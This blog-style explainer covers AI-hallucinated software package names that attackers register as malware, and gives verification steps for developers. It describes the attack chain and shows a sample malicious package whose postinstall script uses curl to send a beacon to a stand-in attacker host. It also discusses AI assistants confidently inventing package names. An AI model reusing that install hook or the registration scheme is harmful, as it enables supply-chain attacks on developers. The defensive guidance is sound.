I Asked Claude for a Package. It Didn't Exist. An Attacker Had Already Registered It.

You ask Claude to help you validate JSON schemas. It suggests importing json-schema-validator-express. The package name sounds perfect. You run npm install. Congratulations, you just installed malware.

This attack vector didn’t exist two years ago. AI created it.

How Package Hallucination Works

Package Hallucination: When an AI model confidently recommends a software package that doesn’t exist, inventing a plausible-sounding name based on patterns in its training data rather than actual package registry contents.

AI models don’t have real-time access to npm, PyPI, or other package registries. They generate package recommendations based on patterns: common naming conventions, what sounds right, what similar packages are called.

The problem: what sounds right often isn’t real.

// AI-generated suggestion
const validator = require('express-json-schema-validator');
// Sounds legitimate. Follows naming conventions.
// Doesn't exist on npm... or didn't, until an attacker registered it.

// What actually exists
const { Validator } = require('jsonschema');
// Less intuitive name, but real and maintained

The Attack Chain

The attack is elegant in its simplicity:

Step 1: Reconnaissance Attackers query AI models with common development tasks and collect suggested package names. They identify names that don’t exist but sound legitimate.

Step 2: Registration The attacker registers the hallucinated package name on npm, PyPI, or other registries. They add code that appears functional but includes malicious payloads.

Step 3: Wait When developers ask AI for help and receive the hallucinated recommendation, they install the attacker’s package. The malicious code executes during installation or runtime.

// Malicious package masquerading as helpful
// express-json-schema-validator/index.js

const validator = require('jsonschema').Validator;

// Looks normal, actually works for validation
module.exports = {
  validate: (schema, data) => {
    // Legitimate functionality
    const v = new Validator();
    return v.validate(data, schema);
  }
};

// But the postinstall script does this:
// "postinstall": "node -e \"require('child_process').exec('curl attacker.com/beacon?pkg='+process.env.npm_package_name)\""

The package works. Tests pass. The attack succeeds.

Real-World Examples

The python-jwt Incident

Researchers found that AI models consistently recommended python-jwt for JWT handling in Python. The actual package is PyJWT. An attacker registered python-jwt with typosquatting code.

The express-validator Variants

Multiple variants of express-validator (the real package) have been recommended by AI:

  • express-input-validator (hallucinated)
  • express-body-validator (hallucinated)
  • express-form-validator (hallucinated)

Attackers registered several before the pattern was identified.

The Lasso Security Study

Lasso Security documented over 200 malicious packages that exploited AI hallucination patterns. Their research found that popular AI coding assistants hallucinate package names at rates between 5% and 20%, depending on the language and domain.

Why AI Hallucinations Happen

AI models generate package names through pattern matching, not registry lookup:

Naming Convention Patterns Models learn that Express middleware often follows express-{function} patterns. When asked about JSON validation, they generate express-json-validator because that fits the pattern.

Training Data Gaps Training data includes documentation, tutorials, and code from specific points in time. Packages created after training aren’t known. Packages that existed but were deprecated might still be recommended.

Confidence Without Verification Models present hallucinated packages with the same confidence as real ones. There’s no “I’m not sure this exists” qualifier.

# AI recommendation with high confidence
# "For CSV parsing in Python, I recommend using pandas-csv-parser"

import pandas_csv_parser  # Does not exist!

# What you should use
import pandas as pd
df = pd.read_csv('file.csv')

Detection and Prevention

Protect Against Hallucinated Dependencies

Systematic approach to verifying AI package recommendations

Verify Before Installing

Before running npm install or pip install, verify the package exists:

  • Search the package registry directly
  • Check the package’s npm/PyPI page
  • Look for download statistics, maintainer info, repository links
  • Zero downloads or very recent creation dates are red flags
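The existence check is easy to script. The sketch below queries npm's public registry (the `https://registry.npmjs.org/<name>` endpoint, which returns a 404 for unregistered names); the helper names are my own:

```python
import urllib.error
import urllib.parse
import urllib.request

REGISTRY = "https://registry.npmjs.org"

def registry_url(name: str) -> str:
    """Build the registry metadata URL; scoped names (@scope/pkg) need the slash escaped."""
    return f"{REGISTRY}/{urllib.parse.quote(name, safe='@')}"

def npm_package_exists(name: str) -> bool:
    """True if the name is registered on npm, False on a 404 from the registry."""
    try:
        with urllib.request.urlopen(registry_url(name)) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise
```

A hallucinated name fails this check immediately, which is exactly the window attackers exploit: the check passing tells you only that *someone* registered the name, not that it is safe.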

Check Package Age

Legitimate packages have history. Run npm view {package} time to see when it was created. Packages less than a few months old that AI recommends confidently deserve extra scrutiny.

Inspect Before Install

Use npm pack {package} to download without installing. Examine the contents, especially postinstall scripts, before adding to your project.
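After unpacking the tarball, the manifest can be checked mechanically for lifecycle scripts that run automatically at install time. A minimal sketch (the function name is illustrative, not a standard tool):

```python
import json

# npm lifecycle hooks that execute automatically during `npm install`
RISKY_SCRIPTS = {"preinstall", "install", "postinstall"}

def flag_install_scripts(package_json_text: str) -> dict:
    """Return any scripts in a package.json that run at install time."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in RISKY_SCRIPTS}
```

Any non-empty result deserves a close read; a `postinstall` that shells out to `curl` or `node -e` is the classic payload pattern shown earlier.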

Use Lock Files

Commit package-lock.json or yarn.lock. These lock specific versions and make it harder for attackers to swap malicious code into existing packages.

Implement Dependency Scanning

Tools like Socket.dev, Snyk, and npm audit can flag suspicious packages. Run these before installing new dependencies, not just in CI/CD.

Verification Commands

Quick commands to validate packages before installation:

# Check if package exists and get metadata
npm view express-json-schema-validator

# See when package was created and modified
npm view express-json-schema-validator time

# Check download statistics (npm view has no downloads field; use the downloads API)
curl https://api.npmjs.org/downloads/point/last-week/express-json-schema-validator

# For Python packages
pip index versions pandas-csv-parser

# Download and inspect without installing
npm pack suspicious-package-name
tar -xzf suspicious-package-name-*.tgz
cat package/package.json

If npm view returns “404 Not Found,” the AI hallucinated the package. If it exists but was created very recently, investigate further.

Framework for AI Package Recommendations

When AI suggests a package, run through this decision tree:

AI suggests package "foo-bar-validator"

├── Does it exist? (npm view foo-bar-validator)
│   ├── No  → HALLUCINATION. Find real alternative.
│   └── Yes → Continue checking
│
├── When was it created? (npm view foo-bar-validator time.created)
│   ├── Last 6 months → SUSPICIOUS. Extra verification needed.
│   └── Older         → Continue checking
│
├── Download count?
│   ├── < 100 weekly → SUSPICIOUS. Probably not what AI "learned" about.
│   └── Higher       → Continue checking
│
├── Repository link valid?
│   ├── No repo or broken link → SUSPICIOUS
│   └── Valid GitHub/GitLab    → Continue checking
│
└── Maintainer credible?
    ├── No history, no other packages → VERIFY CODE MANUALLY
    └── Established maintainer        → Probably safe

The Deeper Problem

Package hallucination reveals a fundamental issue with AI-assisted development: AI models present fiction with the same confidence as fact.

AI Confidence Calibration: The relationship between an AI model’s expressed certainty and the actual accuracy of its outputs. Poorly calibrated models express high confidence in incorrect or fabricated information.

The model doesn’t know what it doesn’t know. It has no concept of “this package might not exist.” Every recommendation comes with equal confidence because confidence is generated, not measured.

This isn’t a bug that will be fixed. It’s a fundamental characteristic of how large language models work. The solution isn’t better AI. The solution is verification.

FAQ

Can npm/PyPI prevent this attack?

Package registries can flag suspicious patterns: packages registered immediately after AI model releases, packages with names matching common hallucination patterns, packages with malicious install scripts. However, they can’t prevent legitimate-looking packages from being registered. The verification burden falls on developers.

Which AI models hallucinate packages most?

All major AI coding assistants hallucinate packages. Research shows rates vary by language and task complexity. Python packages are hallucinated at slightly higher rates than JavaScript. Specialized domains (validation, authentication, parsing) see higher hallucination rates because naming conventions are more predictable.

Is this a form of prompt injection?

No, it’s different. Prompt injection manipulates AI behavior through crafted inputs. Package hallucination is an emergent behavior of how models generate text. The AI isn’t being tricked. It’s confidently generating plausible-sounding but incorrect information.

How do I report a suspicious hallucinated package?

Report suspicious packages to the registry’s security team. Both npm and PyPI provide malware-reporting channels on their sites; include the package name, the behavior you observed, and the AI prompt that surfaced it.

Should I stop using AI for package recommendations?

No, but verify everything. AI recommendations are suggestions, not facts. Treat every package recommendation as “this sounds like it could exist” rather than “this definitely exists and is safe.”

Conclusion

Key Takeaways

  • AI models hallucinate 5-20% of package recommendations, inventing plausible names that don’t exist
  • Attackers register hallucinated package names and wait for developers to install them
  • Over 200 malicious packages have exploited this attack vector
  • The attack works because malicious packages often include real functionality alongside malicious code
  • Verification before installation is no longer optional in AI-assisted development
  • Check package existence with npm view or pip index versions before installing
  • Package age and download count help identify recently-registered attack packages
  • Lock files (package-lock.json) provide some protection against dependency manipulation
  • AI confidence doesn’t correlate with accuracy; treat all recommendations as unverified suggestions

Package hallucination is the supply chain attack AI created. The tools that accelerate our development also accelerate our exposure to this new attack vector.

The fix is simple but requires discipline: verify every package before installation. The three seconds of checking save you from becoming the next supply chain attack statistic.
